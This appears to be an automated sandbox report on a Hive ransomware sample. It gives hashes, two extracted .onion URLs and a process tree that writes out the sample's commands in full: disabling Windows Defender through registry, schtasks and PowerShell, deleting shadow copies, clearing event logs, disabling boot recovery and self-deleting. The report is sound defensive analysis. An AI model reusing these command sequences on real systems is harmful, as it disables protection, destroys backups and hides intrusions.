Analysis
max time kernel: 131s
max time network: 49s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 10-10-2022 19:52

Static task: static1
Behavioral task: behavioral1
Sample: 0e4d44dde522c07d09d9e3086cfae803.exe
Resource: win7-20220812-en

General
Target: 0e4d44dde522c07d09d9e3086cfae803.exe
Size: 3.9MB
MD5: 0e4d44dde522c07d09d9e3086cfae803
SHA1: d8dc26e2094869a0da78ecb47494c931419302dc
SHA256: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512: ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP: 49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Extracted from: C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses mpcmdrun utility to delete all AV definitions.
PID 1212 MpCmdRun.exe

Hive
A ransomware written in Golang first seen in June 2021.

Modifies Windows Defender Real-time Protection settings
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" (reg.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" (reg.exe)
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" (reg.exe)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" (reg.exe)
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)

Modifies security service (2 TTPs, 1 IoC)
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" (reg.exe)

Clears Windows event logs (1 TTP, 3 IoCs)
PID 776 wevtutil.exe, PID 1120 wevtutil.exe, PID 1204 wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
PID 952 bcdedit.exe, PID 1364 bcdedit.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory (64 IoCs)
Launches sc.exe (8 IoCs)
Sc.exe is a Windows utility to control services on the system.
PID 1656 sc.exe, PID 1872 sc.exe, PID 1280 sc.exe, PID 268 sc.exe, PID 1400 sc.exe, PID 1600 sc.exe, PID 1716 sc.exe, PID 888 sc.exe

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
PID 1520 vssadmin.exe

Opens file in notepad (likely ransom note) (1 IoC)
PID 2256 notepad.exe

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)
PID 2288 PING.EXE

Suspicious behavior: EnumeratesProcesses (3 IoCs)
PID 1832 powershell.exe, PID 1816 powershell.exe, PID 1800 0e4d44dde522c07d09d9e3086cfae803.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
(process tree; the number in brackets is the depth, followed by the image path, PID, command line and triggered signatures)

[1] C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe (PID 1800): "C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\net.exe (PID 1108): net.exe stop "NetMsmqActivator" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 960): C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    [2] C:\Windows\system32\net.exe (PID 948): net.exe stop "SamSs" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 1736): C:\Windows\system32\net1 stop "SamSs" /y
    [2] C:\Windows\system32\net.exe (PID 1252): net.exe stop "SDRSVC" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 1728): C:\Windows\system32\net1 stop "SDRSVC" /y
    [2] C:\Windows\system32\net.exe (PID 1528): net.exe stop "SstpSvc" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 608): C:\Windows\system32\net1 stop "SstpSvc" /y
    [2] C:\Windows\system32\net.exe (PID 1100): net.exe stop "UI0Detect" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 1232): C:\Windows\system32\net1 stop "UI0Detect" /y
    [2] C:\Windows\system32\net.exe (PID 684): net.exe stop "VSS" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 1200): C:\Windows\system32\net1 stop "VSS" /y
    [2] C:\Windows\system32\net.exe (PID 304): net.exe stop "wbengine" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 1564): C:\Windows\system32\net1 stop "wbengine" /y
    [2] C:\Windows\system32\net.exe (PID 1720): net.exe stop "WebClient" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe (PID 292): C:\Windows\system32\net1 stop "WebClient" /y
    [2] C:\Windows\system32\sc.exe (PID 1872): sc.exe config "NetMsmqActivator" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\sc.exe (PID 1280): sc.exe config "SamSs" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\sc.exe (PID 268): sc.exe config "SDRSVC" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\sc.exe (PID 1400): sc.exe config "SstpSvc" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\sc.exe (PID 1600): sc.exe config "UI0Detect" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\sc.exe (PID 1716): sc.exe config "VSS" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\sc.exe (PID 888): sc.exe config "wbengine" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\sc.exe (PID 1656): sc.exe config "WebClient" start= disabled
        - Launches sc.exe
    [2] C:\Windows\system32\reg.exe (PID 556): reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\system32\reg.exe (PID 1076): reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    [2] C:\Windows\system32\reg.exe (PID 1732): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    [2] C:\Windows\system32\reg.exe (PID 1956): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    [2] C:\Windows\system32\reg.exe (PID 1616): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    [2] C:\Windows\system32\reg.exe (PID 1704): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
    [2] C:\Windows\system32\reg.exe (PID 1552): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
    [2] C:\Windows\system32\reg.exe (PID 608): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
    [2] C:\Windows\system32\reg.exe (PID 284): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
    [2] C:\Windows\system32\reg.exe (PID 672): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
    [2] C:\Windows\system32\reg.exe (PID 1116): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    [2] C:\Windows\system32\reg.exe (PID 1692): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    [2] C:\Windows\system32\reg.exe (PID 1064): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    [2] C:\Windows\system32\reg.exe (PID 2020): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    [2] C:\Windows\system32\reg.exe (PID 1008): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    [2] C:\Windows\system32\reg.exe (PID 804): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    [2] C:\Windows\system32\schtasks.exe (PID 1740): schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    [2] C:\Windows\system32\schtasks.exe (PID 576): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    [2] C:\Windows\system32\schtasks.exe (PID 1776): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    [2] C:\Windows\system32\schtasks.exe (PID 1664): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    [2] C:\Windows\system32\schtasks.exe (PID 1984): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    [2] C:\Windows\system32\reg.exe (PID 1736): reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
    [2] C:\Windows\system32\reg.exe (PID 856): reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
    [2] C:\Windows\system32\reg.exe (PID 1412): reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    [2] C:\Windows\system32\reg.exe (PID 1660): reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    [2] C:\Windows\system32\reg.exe (PID 524): reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    [2] C:\Windows\system32\reg.exe (PID 1176): reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    [2] C:\Windows\system32\reg.exe (PID 1336): reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\system32\reg.exe (PID 580): reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\system32\reg.exe (PID 1964): reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\system32\reg.exe (PID 2000): reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\system32\reg.exe (PID 1152): reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        - Modifies security service
    [2] C:\Windows\system32\reg.exe (PID 1596): reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\system32\vssadmin.exe (PID 1520): vssadmin.exe delete shadows /all /quiet
        - Interacts with shadow copies
    [2] C:\Windows\system32\wevtutil.exe (PID 776): wevtutil.exe cl system
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\system32\wevtutil.exe (PID 1120): wevtutil.exe cl security
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\system32\wevtutil.exe (PID 1204): wevtutil.exe cl application
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\System32\Wbem\wmic.exe (PID 1284): wmic.exe SHADOWCOPY /nointeractive
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\System32\Wbem\wmic.exe (PID 1644): wmic.exe shadowcopy delete
        - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\system32\bcdedit.exe (PID 952): bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        - Modifies boot configuration data using bcdedit
    [2] C:\Windows\system32\bcdedit.exe (PID 1364): bcdedit.exe /set {default} recoveryenabled no
        - Modifies boot configuration data using bcdedit
    [2] C:\Windows\system32\cmd.exe (PID 968): cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        [3] C:\Program Files\Windows Defender\MpCmdRun.exe (PID 1212): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
            - Deletes Windows Defender Definitions
    [2] C:\Windows\system32\cmd.exe (PID 1760): cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1832): powershell Set-MpPreference -DisableIOAVProtection $true
            - Suspicious behavior: EnumeratesProcesses
    [2] C:\Windows\system32\cmd.exe (PID 1212): cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1816): powershell Set-MpPreference -DisableRealtimeMonitoring $true
            - Suspicious behavior: EnumeratesProcesses
    [2] C:\Windows\system32\notepad.exe (PID 2256): notepad.exe C:\n8pw_HOW_TO_DECRYPT.txt
        - Opens file in notepad (likely ransom note)
    [2] C:\Windows\system32\cmd.exe (PID 2264): cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"
        [3] C:\Windows\system32\PING.EXE (PID 2288): ping.exe -n 5 127.0.0.1
            - Runs ping.exe
Network
MITRE ATT&CK Enterprise v6